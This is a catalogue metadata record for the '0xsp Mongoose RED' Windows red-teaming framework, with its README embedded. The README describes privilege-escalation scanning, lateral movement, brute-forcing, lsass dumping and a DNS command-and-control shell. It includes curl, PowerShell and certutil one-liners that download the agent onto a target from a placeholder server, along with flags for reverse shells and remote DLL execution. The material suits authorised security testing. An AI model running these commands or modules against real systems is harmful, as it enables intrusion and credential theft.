{"id":13539879,"url":"https://github.com/zux0x3a/0xsp-Mongoose","last_synced_at":"2025-09-27T12:32:04.667Z","repository":{"id":35448669,"uuid":"191637806","full_name":"zux0x3a/0xsp-Mongoose","owner":"zux0x3a","description":"a unique framework for cybersecurity simulation and red teaming operations, windows auditing for newer vulnerabilities, misconfigurations and privilege escalations attacks, replicate the tactics and techniques of an advanced adversary in a network.","archived":true,"fork":false,"pushed_at":"2022-03-27T06:11:24.000Z","size":27658,"stargazers_count":529,"open_issues_count":3,"forks_count":121,"subscribers_count":27,"default_branch":"0xsp-red","last_synced_at":"2025-01-12T00:47:47.503Z","etag":null,"topics":["0xsp-mongoose","agent","backdoor-attacks","impersonation","lateral-movement","mongoose","privilege-escalation","redteam","redteaming","security-audit","security-tools","toolkit","webapi","windows","windows-vulnerability"],"latest_commit_sha":null,"homepage":"https://0xsp.com","language":"Pascal","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/zux0x3a.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null},"funding":{"patreon":"0xsp"}},"created_at":"2019-06-12T20:12:16.000Z","updated_at":"2024-12-20T01:40:42.000Z","dependencies_parsed_at":"2022-07-14T14:00:32.319Z","dependency_job_id":null,"html_url":"https://github.com/zux0x3a/0xsp-Mongoose","commit_stats":null,"previous_names":[],"tags_count":5,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/zux0x3a%2F0xsp-Mongoose","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/zux0x3a%2F0xsp-Mongoose/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/zux0x3a%2F0xsp-Mongoose/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/zux0x3a%2F0xsp-Mongoose/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/zux0x3a","download_url":"https://codeload.github.com/zux0x3a/0xsp-Mongoose/tar.gz/refs/heads/0xsp-red","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":234437959,"owners_count":18832589,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["0xsp-mongoose","agent","backdoor-attacks","impersonation","lateral-movement","mongoose","privilege-escalation","redteam","redteaming","security-audit","security-tools","toolkit","webapi","windows","windows-vulnerability"],"created_at":"2024-08-01T09:01:33.386Z","updated_at":"2025-09-27T12:31:58.646Z","avatar_url":"https://github.com/zux0x3a.png","language":"Pascal","funding_links":["https://patreon.com/0xsp"],"categories":["\u003ca id=\"1233584261c0cd5224b6e90a98cc9a94\"\u003e\u003c/a\u003e渗透\u0026\u0026offensive\u0026\u0026渗透框架\u0026\u0026后渗透框架","\u003ca id=\"3ed50213c2818f1455eff4e30372c542\"\u003e\u003c/a\u003e工具","Pascal"],"sub_categories":["\u003ca id=\"a9494547a9359c60f09aea89f96a2c83\"\u003e\u003c/a\u003e后渗透","\u003ca id=\"4c2095e7e192ac56f6ae17c8fc045c51\"\u003e\u003c/a\u003e提权\u0026\u0026PrivilegeEscalation"],"readme":"[![GPLv3 license](https://img.shields.io/badge/License-GPLv3-blue.svg)](http://perso.crans.org/besson/LICENSE.html)\n[\u003cimg src=\"https://img.shields.io/badge/join-telegram-blue\"\u003e](https://t.me/join0xsp)\n[\u003cimg src=\"https://img.shields.io/badge/build%20with-Lazarus-red.svg\"\u003e](https://www.lazarus-ide.org/)\n[\u003cimg align=\"right\" src=\"https://github.com/lawrenceamer/0xsp-Mongoose/blob/0xsp-red/lg.png?raw=true\" height=\"512\" width=\"400\"\u003e]()\n[\u003cimg src=\"https://img.shields.io/badge/join-discord-orange\"\u003e](https://discord.gg/Xsdxxkm)\n[\u003cimg src=\"https://img.shields.io/twitter/follow/zux0x3a?label=follow\u0026style=social\"\u003e](https://twitter.com/zux0x3a)\n\nSupport the project for continuous development (ETH **0xf340c15c5e669a4ababab856e9f2bccd659d6e42**)\n\n# 0xsp Mongoose RED for Windows \nCurrent Release **2.2.0** \n\n0xsp mongoose red version is provided to assist your needs during cyber security simulation, by using this version you will be able to audit a targeted windows operation system \nfor system vulnerabilities, misconfigurations and privilege escalation attacks and replicate the tactics and techniques of an advanced adversary in a network.\n\nwith node js support for web application API, it becomes much easier for installation and customization in timely manner, the windows sensor agent will communicate with application API to transfer results, and receive commands as bidirectional technique. \n\nthe agent is able to identify and detect windows exploits by using `windows update api` and `exploit database definitions` modules, the new release will detect also the following \nvulnerabilities.\n \n* CVE-2019-0836\n* CVE-2019-0841\n* CVE-2019-1064\n* CVE-2019-1130\n* CVE-2019-1253\n* CVE-2019-1385\n* CVE-2019-1388\n* CVE-2019-1405\n* CVE-2019-1315\n* CVE-2020-0787\n* CVE-2020-0796\n* CVE-2020-0797 \n* CVE-2020-1472\n* CVE-2021-1675\n\n## Features \n\n* Windows Privilege escalation scanning techniques. \n* web application built with NodeJS \n* supports sqlite DB \n* Lateral movements techniques. [ video](https://www.youtube.com/watch?v=pEpiOrpyYs8)\n* Bidirectional communication channel.[ video ](https://www.youtube.com/watch?v=tyhBuWCB_aY)\n* Plugins online packaging.  \n* Enhanced exploit detecter scripting engine. \n* Windows Account Bruteforce Module (Local / Domain)\n* weaponization of run-as-user windows api function. [Video](https://youtu.be/oe-BFZpV8nw)\n* local network scanning and shares enumeration.\n* lsass memory dummping technique (plugin).\n* DNS C2C interactive shellmode \n\n### installation \n\n```\ngit clone --single-branch --branch 0xsp-red https://github.com/lawrenceamer/0xsp-mongoose \ncd 0xsp-mongoose/ \nnpm install \nnode index.js\n```\ndefault access credentials :\n* username : admin \n* password : 0xsp\n\n[\u003cimg align=\"right\" src=\"https://i.imgur.com/EQOsiv8.png\"\u003e]()\n\n\n\n### DNS C2C python script \n\n```\ntouch temp.txt\npython3 dns_server.py -d DOMAIN -a PUBLICIP -i INTERFACEIP\n```\n\n\n### quick deploy of agent \n\n```\n#example 1 \ncurl.exe -o agent.exe http://nodejsip:4000/release/x64.exe\n#example 2 \npowershell.exe -command (new-object net.webclient).downloadfile('http://nodejsip:4000/release/x64.exe','c:\\tmp\\agent.exe');\n#example 3 \ncertutil.exe -urlcache -split -f \"http://nodejsip:4000/release/x64.exe\" agent.exe\n\n```\n\n\n### Usage \n```\n-s --retrieve windows services and installed drivers.\n-u --retrieve information about Users, groups, roles.\n-c --search connected drivers for senstive config files by extension.\n-n --retrieve network information,network interfaces, connection details.\n-w --enumerate for writeable directories, access permission Check, modified permissions.\n-i --enumerate windows system information, Sessions, Always elvated check.\n-l --search in any file for specific string , ex : agent.exe -l c:\\ password *.config.\n-o --specify host address of nodejs application , you can use srvhost also\n-p --enumerate installed Softwares, Running Processes, Tasks.\n-e --kernel inspection Tool, it will help to search through tool databases for windows kernel vulnerabilities\n-x --password to authorize your connection with node js application.\n-d --download Files directly into target machine.\n-t --upload Files From target machine into node js application.\n-spooler --scan single host or list of hosts for possible CVE-2021-1675 (e.g -spooler -srvhost or -spooler -hosts )\n-m --run all known scan Types together.\n\n[!] RED TEAMING TACTICS SECTION\n\n-r --spawn a reverse shell with specific account.\n-lr --Lateral movement technique using WMI (e.g -lr -host 192.168.14.1 -username administrator -password blabla -srvhost nodejsip )\n-nds --network discovery and share enumeration\n-dns --establish interactive dns C2C shell\n-cmd --transfer commands via HTTP Shell\n-interactive --starting interactive mode (eg : loading plugins ..etc)\n-username --identity authentication for specific attack modules.\n-password --identity authentication for specific attack modules.\n-host --identify remote host to conduct an attack to.\n-srvhost --set rhost of node js application.\n-bf --local users / domain users bruteforce module\n-import --import and execute dll file locally\n-remote --import and execute dll file from remote host\n```\n### Documentations\nhttps://0xsp.com/security%20dev/0xsp-mongoose-red\n\n### detailed research site \nhttps://0xsp.com \n\n### Security Conferences \n* Standoff365 - Russia (https://standoff365.com/conferences/357)\n\n### tool tutorials \nmake sure to subscribe into the following channel to be notified when new tutorial and tricks published for 0xsp \nhttps://www.youtube.com/channel/UCoEr6Qsyd6oMsPmaJPQ_FOg\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fzux0x3a%2F0xsp-Mongoose","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fzux0x3a%2F0xsp-Mongoose","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fzux0x3a%2F0xsp-Mongoose/lists"}